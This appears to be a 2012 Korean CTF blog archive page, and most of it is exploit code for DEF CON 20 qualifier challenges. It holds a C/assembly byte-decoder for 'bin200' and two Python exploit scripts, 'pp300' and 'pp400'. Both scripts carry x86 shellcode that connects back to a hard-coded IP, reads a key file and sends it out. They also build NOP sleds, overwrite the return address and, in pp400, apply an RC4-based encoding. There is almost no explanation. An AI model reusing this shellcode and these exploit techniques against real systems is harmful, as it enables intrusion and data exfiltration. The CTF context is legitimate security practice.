challenge 02
2012. 7. 20. 06:38
보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.
내용을 보시려면 비밀번호를 입력하세요.
Search results for 'before I die'
- 2012.07.20 -- challenge 02
- 2012.07.20 -- challenge 55
- 2012.07.18 -- challenge 46
- 2012.07.18 -- challenge 45
- 2012.07.18 -- challenge 53
- 2012.07.17 -- challenge 27
- 2012.07.17 -- webhacking.kr 7
- 2012.06.22 -- defcon20 bin200
- 2012.06.16 -- defcon20 pp400 exploit
- 2012.06.16 -- defcon20 pp300 exploit
defcon20 bin200
2012. 6. 22. 02:39
#include <stdio.h>
int main(int argc, char *argv[])
{
char fname[] = "c:\\mac.h";
char buf[1024] = {0};
FILE* fp;
int ret = 0;
fp = fopen(fname, "r");
if (fp < 0)
{
printf("fopen error\n");
return -1;
}
ret = fread(buf,1,991, fp);
printf("buf: %s\n\n", buf);
__asm{
xor ecx, ecx
mov edx, 1
lea eax, dword ptr buf
xor ebx, ebx
dec eax
dec ecx
#if 1
badcob:
inc eax
inc ecx
mov bl, byte ptr ss:[eax]
not bl
mov byte ptr ss:[eax], bl
cmp ecx, 0x3df
jnz badcob
#endif
}
printf("buf: %s\n", buf);
fclose(fp);
return 0;
}
'CTF' 카테고리의 다른 글
| Holyshield 2010 Write up (2) | 2012.11.28 |
|---|---|
| JFF2 JH1 (2) | 2012.08.11 |
| jff2 silly100 (5) | 2012.08.06 |
| defcon20 pp400 exploit (0) | 2012.06.16 |
| defcon20 pp300 exploit (0) | 2012.06.16 |
| defcon20 pp200 exploit (0) | 2012.06.16 |
| pctf 2012 format (0) | 2012.05.09 |
| Defcon 19 b500 writeup (0) | 2011.06.17 |
| ISEC 2010 level8 random array (0) | 2010.11.10 |
defcon20 pp400 exploit
2012. 6. 16. 14:14
http://blog.oxff.net/posts/DefCon%2020%20CTF%20Qualifications%3A%20pp400-anvszwpmjdyizhsqgngq.html 참조.
#!/usr/bin/python2.6
#defcon 2012, pp400 exploit - badcob
import socket,sys
import struct
import time
def rc4_initialize(key,x,y):
tmp = range(255,-1,-1)
for i in range(0, 256):
y = (y + tmp[x] +(ord(key[x & 0xf]))) & 0xff
tmp[x],tmp[y] = tmp[y], tmp[x]
return tmp
def rc4_pop_key(tmp, x, y):
x = (x+1) & 0xff
y = (y+tmp[x]) & 0xff
tmp[x], tmp[y] = tmp[y], tmp[x]
return tmp[(tmp[x]+tmp[y]) && 0xff], x, y
#shellcode
sc = "\x83\xC4\x70\x6A\x61\x58\x99\x52\x6A\x01\x6A\x02\x50\xCD\x80\x96\x6A\x62\x58\x68\xD2\x00\x3C\xEB\x68\xAA\x02\x27\x0F"
sc += "\x89\xE3\x6A\x10\x53\x56\x50\xCD\x80\x6A\x05\x58\x52\x68\x2F\x6B\x65\x79\x68\x2E\x2F\x2F\x2F"
sc += "\x89\xE3\x52\x53\x50\xCD\x80\x97\x6A\x03\x58\x6A\x40\x53\x57\x50\xCD\x80\x50\x6A\x04\x58\x53\x56\x50\xCD\x80"
#stack address to overwrite
stack_address = 0xbfbfe9fc
#make payload
payload = []
sc += '\x90'
print len(sc)
while sc != '':
payload.append(struct.unpack('<I', sc[:4])[0])
sc = sc[4:]
#nop sled + shellcode
#0x42 : inc edx
payload = [0x90909090 for i in range(0,128-len(payload))] + payload
payload += [0x42424242 for i in range(0,248-128)]
payload += [0xbfbfe9fc]
total_count = len(payload)
current_count = 0
#rc4 initialize
global tmp, x, y
x = 0
y = 0
key = '\xb6\x3d\x15\x3a\x04\x15\x69\x72\x45\xfe\xc2\x7f\x12\x78\xd7\x82'
tmp = rc4_initialize(key,x,y)
print tmp
print len(tmp)
#host, port
host = '192.168.74.134'
port = 4016
def init(host,port):
b = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
b.connect((host,port))
return b
s = init(host,port)
passwd = 'b366e2776ce9efff'+'\x0a'
s.send(passwd)
print s.recv(256)
sys.stdout.flush()
for i in payload:
print current_count, hex(i)
data_list = []
data = str(struct.unpack('<f', struct.pack('<I', i))[0])
data = data[::-1]
for j in data:
value, x, y = rc4_pop_key(tmp, x, y)
data_list.append(chr(ord(j) ^ value))
data_list.reverse()
data = ''.join(data_list)
print data.encode('hex')
try:
s.send(data.encode('hex')+'\x0a')
except:
print 'float error:', i, hex(i), '[+]' + data.encode('hex') + '[+]'
break
current_count += 1
'CTF' 카테고리의 다른 글
| Holyshield 2010 Write up (2) | 2012.11.28 |
|---|---|
| JFF2 JH1 (2) | 2012.08.11 |
| jff2 silly100 (5) | 2012.08.06 |
| defcon20 bin200 (0) | 2012.06.22 |
| defcon20 pp300 exploit (0) | 2012.06.16 |
| defcon20 pp200 exploit (0) | 2012.06.16 |
| pctf 2012 format (0) | 2012.05.09 |
| Defcon 19 b500 writeup (0) | 2011.06.17 |
| ISEC 2010 level8 random array (0) | 2010.11.10 |
defcon20 pp300 exploit
2012. 6. 16. 14:10
#!/usr/bin/python2.6
#defcon 2012, pp300 exploit - badcob
import socket, sys
from struct import pack
def make_connection(host,port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
return s
def make_payload(scode):
#padding 1 byte : shellcode length 79byte
scode += "\x90"
#move byte ptr ss:[ebp+x], shellcode 1 byte
mov_byte_ptr = "\xc6\x45"
tmp = ''
count = 0
for x in scode:
tmp += mov_byte_ptr + chr(count) + x
count += 0x1
#call ebp
call_ebp = "\xff\xd5\x90\xff"
return tmp + call_ebp
#shellcode
scode = "\x83\xC4\x70\x6A\x61\x58\x99\x52\x6A\x01\x6A\x02\x50\xCD\x80\x96\x6A\x62\x58\x68\xD2\x00\x3C\xEB\x68\xAA\x02\x27\x0F"
scode += "\x89\xE3\x6A\x10\x53\x56\x50\xCD\x80\x6A\x05\x58\x52\x68\x2F\x6B\x65\x79\x68\x2E\x2F\x2F\x2F"
scode += "\x89\xE3\x52\x53\x50\xCD\x80\x97\x6A\x03\x58\x6A\x40\x53\x57\x50\xCD\x80\x50\x6A\x04\x58\x53\x56\x50\xCD\x80"
host = "192.168.74.134"
port = 7548
num = "3c56bc31268ac65f" + "\x0a"
#make payload
payload = make_payload(scode)
s = make_connection(host,port)
s.send(num)
s.send(payload)
'CTF' 카테고리의 다른 글
| Holyshield 2010 Write up (2) | 2012.11.28 |
|---|---|
| JFF2 JH1 (2) | 2012.08.11 |
| jff2 silly100 (5) | 2012.08.06 |
| defcon20 bin200 (0) | 2012.06.22 |
| defcon20 pp400 exploit (0) | 2012.06.16 |
| defcon20 pp200 exploit (0) | 2012.06.16 |
| pctf 2012 format (0) | 2012.05.09 |
| Defcon 19 b500 writeup (0) | 2011.06.17 |
| ISEC 2010 level8 random array (0) | 2010.11.10 |